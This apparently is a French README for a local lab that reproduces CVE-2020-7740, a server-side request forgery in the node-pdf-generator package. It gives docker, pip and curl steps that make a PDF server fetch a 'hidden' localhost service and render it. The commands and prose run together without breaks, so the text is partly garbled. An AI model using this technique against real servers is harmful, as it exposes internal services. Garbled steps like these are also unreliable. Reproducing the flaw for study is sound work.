
Un exemple de CVE-2020-7740
Ceci affecte toutes les versions du package node-pdf-generator. En raison du manque de validation et d'assainissement des entrées utilisateur sur le contenu fourni à node-pdf-generator, il est possible pour un attaquant de concevoir une URL qui sera transmise à un serveur externe, permettant une attaque SSRF.
docker run -p 3000:3000 cve-2020-7740localhost:3001 directementcurl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdftest.pdf pour voir le site web localhost qui est censé être masqué.git clone {lien à insérer}https://wkhtmltopdf.org/node .\NodePdfGeneratorServer le serveur fonctionnera sur localhost:3000python3 -m pip install -r requirements.txtpython3 HiddenService le serveur fonctionnera sur 'localhost:3001`curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdfhttp://www.google.com dans le fichier test.pdf